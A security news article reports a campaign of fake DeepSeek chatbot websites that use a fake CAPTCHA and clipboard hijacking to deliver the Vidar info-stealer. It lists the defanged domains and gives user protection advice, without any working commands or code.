Cybercriminals are exploiting the recent launch of the DeepSeek AI chatbot, creating a network of fraudulent websites to trick users. Security researchers from ThreatLabz have uncovered this campaign, which aims to install dangerous malware and steal sensitive personal information. The scheme preys on the public’s growing interest in new AI technologies, turning their curiosity into a significant security risk.
A Wave of Imposter AI Websites Emerges
Just one month after the official launch of DeepSeek, a Chinese AI chatbot, malicious actors have already flooded the internet with convincing imposter sites. These websites are carefully designed to mimic the look and feel of the legitimate platform to lure unsuspecting visitors.
The primary goal of these fake sites is to deceive users into compromising their own security. Researchers have identified several malicious domains actively participating in this campaign.
- deepseeksol[.]com
- deepseeksky[.]com
- deepseek[.]app
- deepseekaiagent[.]live
These platforms promise AI-driven features but instead initiate a process to steal data and distribute malware. Once a user interacts with these sites, they are guided down a path designed to infect their devices.
How the Deceptive Scheme Unfolds
The attack is not immediate but follows a clever multi-step process that builds false trust with the victim before striking. This method increases the chances of a successful infection by making the malicious actions seem like a standard part of a sign-up process.
The criminals have engineered a specific sequence to trap users:
- The Registration Trap: The user is first prompted to create an account on the fake DeepSeek website.
- The Fake CAPTCHA: A phony verification page appears, which is actually a front for the attack.
- Clipboard Hijacking: While the user is distracted, malicious JavaScript silently copies a hidden PowerShell command to their clipboard.
- Malware Execution: If the user pastes and runs this command, it downloads and installs the Vidar info-stealer malware.
Vidar Malware and Its Sinister Purpose
The payload in this attack is Vidar, a well-known and potent information-stealing malware. Its entire purpose is to quietly extract as much valuable data as possible from an infected computer. Vidar is specifically built to find and steal passwords, personal files, browser cookies, and cryptocurrency wallets.
To make their operation more difficult to shut down, the threat actors are using the Telegram messaging platform to manage their command-and-control (C2) infrastructure. This allows them to send commands to the malware and receive stolen data covertly. The malware actively scans for crypto wallet data by searching through specific file paths and registry keys, putting digital assets at immediate risk.
Expert Advice on How to Stay Protected
The rise of fake AI websites is a growing trend, but users can take several steps to protect themselves. Security experts emphasize that vigilance and basic security hygiene are the best defenses against these impersonation attacks.
To reduce your risk of falling victim, follow these recommendations:
- Verify Website Authenticity: Always double-check the URL. Stick to the official DeepSeek website and be suspicious of unfamiliar or slightly different domains.
- Be Cautious with Commands: Never copy and paste commands from a website into a PowerShell or terminal window unless you are absolutely certain of the source and its function.
- Enable Strong Security: Ensure you have reputable antivirus and endpoint detection software installed and kept up to date.
- Watch for Red Flags: Be wary of unexpected registration forms or unusual CAPTCHA requests, especially on new or lesser-known sites.
Organizations are also urged to train their employees to recognize phishing attempts and brand impersonation schemes, as they are a common entry point for wider network breaches.
